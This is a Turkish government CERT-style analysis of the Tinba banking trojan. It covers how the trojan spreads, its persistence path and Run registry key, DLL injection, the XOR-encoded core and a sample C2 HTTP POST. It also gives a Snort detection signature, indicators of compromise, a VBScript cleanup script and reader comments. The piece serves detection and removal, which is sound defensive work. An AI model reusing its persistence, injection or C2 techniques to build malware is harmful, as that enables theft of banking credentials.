spacer.png, 0 kB
Bilgi için: bilgi at bilgiguvenligi gov tr   

 

spacer.png, 0 kB
spacer.png, 0 kB
Tinba Zararlı Yazılım Analizi Yazdır E-posta
Osman PAMUK, TÜBİTAK BİLGEM   
18.09.2012

Son yıllarda siber tehditlerdeki artışın birincil nedenlerinden biri olan zararlı yazılımlar gittikçe daha  karmaşık bir hal almaktadır. Bu tehditlerden biri de şu günlerde güvenlik çevrelerince sıklıkla dile getirilen Tinba zararlı yazılımıdır.  CSIS tarafından adlandırılan bu zararlı yazılım tiny (küçük) ve bank (banka) kelimelerinin birleştirilmesinden oluşmaktadır.  Sadece 18kb civarında olan zararlı yazılım özellikle banka uygulamalarını hedef almaktadır. Tinba'yı asıl önemli kılan ise özellikle Türkiye için özelleşmiş olması ve Türkiye üzerinde aktif olmasıdır.

tinba-sekil-1.jpg
 
  Şekil 1 Son Dört Ayda Tespit Edilen Yayılma Haritası

Yayılma Yöntemi

Tinba yayılması için büyük oranda blackhole exploit alet çantası kullanmaktadır.

Amacı

Tinba veri çalmak için geliştirilmiş bir zararlı yazılımdır. İnternet tarayıcılarından kanca atma yöntemiyle oturum açma bilgilerini toplayabilmektedir. Ayrıca ağ trafiğini dinleme özelliği de mevcuttur. Bunların yanı sıra  araya girme saldırıları ve belli web sayfalarının görünümünü değiştirme yöntemleriyle iki aşamalı yetkilendirmeyi aşabilme yeteneğine sahiptir.

Kendi kendini çalıştırma yöntemi

Zararlı yazılım çalıştıktan sonra kendisinin bir kopyası olarak "%APPDATA%\Default\bin.exe" (Windows XP işletim sistemi üzerinde"%systemDriver%\DocumentsandSettings\%UserName%\Application Data\default\bin.exe")  dosyasını oluşturmaktadır.

Bu dosyanın her oturum açılışında otomatik olarak çalıştırılabilmesi için de "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\default" kayıt defteri girdisini oluşturmaktadır.

tinba-sekil-2.jpg

Dropper ve Çekirdek (core) Parçaları

İlk çalışan zararlı yazılım dosyası (dropper) yukarıda belirtilen ve kendisinin birebir kopyası olan dosyayı oluşturmaktadır. Sonrasında gerekli kayıt defteri (registry) ayarlarını gerçekleştirip, başta “winver.exe” (kendisi tarafından çalıştırılan), “svchost.exe” ve "explorer.exe" işlemleri olmak üzere kendi sahip olduğu haklar ile erişebileceği bütün işletim sistemi işlemlerine (processes) "dll injection" yöntemi ile sızmaktadır.

"Dll injection" yöntemi ile diğer işlemlerde çalıştırılan kod parçacığı asıl zararlı yazılım faaliyetlerini gerçekleştiren kısımdır. Temel olarak bu kod parçacığı, zararlı yazılım yönetim merkezi ile bağlantı kurma ve yeni çalıştırılan işlemlere sızma eylemini gerçekleştirmektedir. Çekirdek (core) olarak adlandırılan bu zararlı kod parçacığı 12866 byte'tan oluşmaktadır ve ilk çalıştırılan zararlı yazılım (dropper) içinde sadece 0x8A (örneğe göre değişmektedir) değeri ile XOR işleminden geçirilerek kodlanmıştır. Aşağıdaki şekilde bu çekirdek kodunu çözmesi ile ilgili akış şeması gösterilmektedir.

 

tinba-sekil-3.jpg
Şekil 2 Çekirdek Kodunun Encode Edilmesi

İlk çalıştırılan zararlı yazılım dosyası (dropper) çekirdeği aktif hale getirip diğer processlere sızma işini gerçekleştirdikten sonra çalışmasını sonlandırmakta ve eğer "%APPDATA%\Default\bin.exe"  konumunda bir örneği yoksa çekirdek kod parçacığı tarafından buraya kendisini kopyalanmaktadır. Tüm bu işlemlerden sonra ilk çalıştırılan yerdeki örneğini silerek kendisini kullanıcıdan gizlemektedir.

Ağ bağlantıları:

Çekirdek çalıştırıldıktan sonra gerçekleştirdiği temel faaliyetlerden birisi de çekirdek içerisinde sabit olarak tanımlanmış yönetim merkezlerine bağlantı kurmaya çalışmaktadır.  Her bir zararlı yazılım örneğinde sadece 4 adet sunucu ismi tanımlanmıştır.

tinba-sekil-4.jpg
Şekil 3 Bilinen Tinba Sunucu İsimleri

İsim çözme işlemi başarılı olduğu takdirde, tespit edilen ip adreslerine 80 inci porttan aşağıda örneklenen HTTP POST isteği (request) gönderilmektedir:

POST /dataSafer3er/ HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: %hostname%

Content-Length:

Connection: Close

Cache-Control: no-cache

Kontrol sunucusu ve ele geçirilen bilgisayar arasındaki bu haberleşme HTTP protokolü üzerinden RC4 ile şifrelenmiş komutlar aracılığıyla gerçekleştirilmektedir..

Tespit Etme Yöntemi

Ağ üzerinde yukarıda belirtilen sunucu isimlerini çözmeye çalışan ve önemli ölçüde sabit HTTP POST isteği gerçekleştirilen bilgisayarların ağ trafiğinin takip edilmesi sonucunda Tinba zararlı yazılımı tespit edilebilir.

Aşağıdak bulunan IDS imzası veya oluşturulabilecek benzer imzalar aracılığı ile bu zararlı yazılım, saldırı tespit sistemleri tarafından tespit edilebilir.

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Tiny Banker Trojan CNC"; sid:5001300; content: "/dataSafer3er/"; http_uri; flow:established,to_server; reference:url,www.bilgiguvenligi.gov.tr; classtype:trojan-activity;)

tinba-resi-5.jpg
Şekil 4 Örnek bir saldırı tespit sistemi tarafından tespit edilen Tinba zararlı yazılımı

Söz konusu bilgisayarda  "%APPDATA%\Default\bin.exe" dosyasına rastlanması ve "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\default" adres defteri kaydının bu dosyayı gösteriyor olması söz konusu bilgisayara Tinba zararlı yazılımının bulaştığını göstermektedir.

Temizleme Yöntemi

Anti-virüs uygulamaları Tinba virüsünü veritabanlarına dahil etmektedirler. Bu nedenle, anti-virüs uygulaması  zararlı yazılım veritabanının güncellenmesi ve sonrasında zararlı yazılımın silinebilmesi için tüm bilgisayarda tarama işleminin gerçekleştirilmesi faydalı olacaktır.

Dosyanın bulaştığı bilgisayardaki "%APPDATA%\Default\bin.exe" dosyasının veya "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\default" adres defteri kaydının silinmesi sonrası işletim sisteminin yeniden başlatılması Tinba zararlı yazılımından tamamen kurtulmak için yeterli olacaktır. Fakat kurumsal ve büyük ölçekli şirketlerin zararlı yazılımdan kurtulması zaman alabileceği düşünülerek, hızlı ve geçici bir çözüm olarak yukarıda  belirtilen alan adı kayıtları kara listeye alınıp, güvenlik duvarı veya saldırı tespit/engelleme sistemleri tarafından engellenebilir.

Yukarıda bahsedilen temizleme yöntemini elle değil otomatik olarak gerçekleştirmek için aşağıda verilen betik ".vbs" uzantılı bir dosya olarak kaydedilip çalıştırılabilir.

on error resume next

dim DosyaSis
Set DosyaSis = CreateObject("Scripting.FileSystemObject")
Set WshShell = WScript.CreateObject("WScript.Shell")
bulundu = 0
DosyaYolu = wshShell.ExpandEnvironmentStrings( "%AppData%" ) + "\default\bin.exe"
KayitGirdisi = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\default"

If DosyaSis.FileExists(DosyaYolu) Then
   DosyaSis.DeleteFile DosyaYolu
   Wscript.echo("Tinba dosyası bulundu ve silindi")
bulundu = 1
End If

WshShell.RegDelete KayitGirdisi
if not err.Number <> 0 then
Wscript.echo("Tinba kayıt girdisi bulundu ve silindi. Bilgisayarınızı yeniden başlatmanız gerekmektedir.")
bulundu = 1
End If

if bulundu = 0 Then
Wscript.echo "Tinba izini rastlanmadı."
End If

Referans:

[1]http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf

[2]https://www.csis.dk/en/csis/news/3566/


Favori olarak ekle (1) | Görüntüleme sayısı: 26737

Yorumlar (4)
1. 29-03-2013 13:51
 
çok güzel bir analiz teşekkür ederim. fakat ben sorunumu .vbs uzantılı dosya ile tamamen ortadan kaldıramadım.antivirüsüm virüsü tespit ediyor ancak silemiyordu. kasper removal tool ile tamamen silindi. karşılaşan arkadaşların bilgilerine.
 
fatma varış
2. 25-09-2012 16:47
 
Gerçekten güzel bir inceleme olmuş. Elinize sağlık Osman bey.
 
Osman Murat ALKAÇ
3. 19-09-2012 18:30
 
Bu şeklide kaliteli ve güzel paylaşımların bizim ülkemizde de yapılıyor olması gerçekten mutluluk verici. 
 
Teşekkürler.
 
Kayhan KAYIHAN
4. 19-09-2012 14:16
 
Çok önemli bir bilgi vermişsiniz, teşekkürler. Bu kadar derin bir araştırma ve açıklamayı birde removal tool ile süslemiş olsaydınız daha iyi olurdu.
 
Alper Peri

Sadece kayıtlı kullanıcılar yorum yazabilir.
Lütfen sisteme giriş yapın veya kayıt olun.

 
spacer.png, 0 kB
spacer.png, 0 kB
Copyright 2017 TÜBİTAK-BİLGEM. Sitenin teknik altyapısında Joomla kullanılmıştır. Yazar ve site referans gösterilmeden alıntı yapılamaz. Görüşleriniz
spacer.png, 0 kB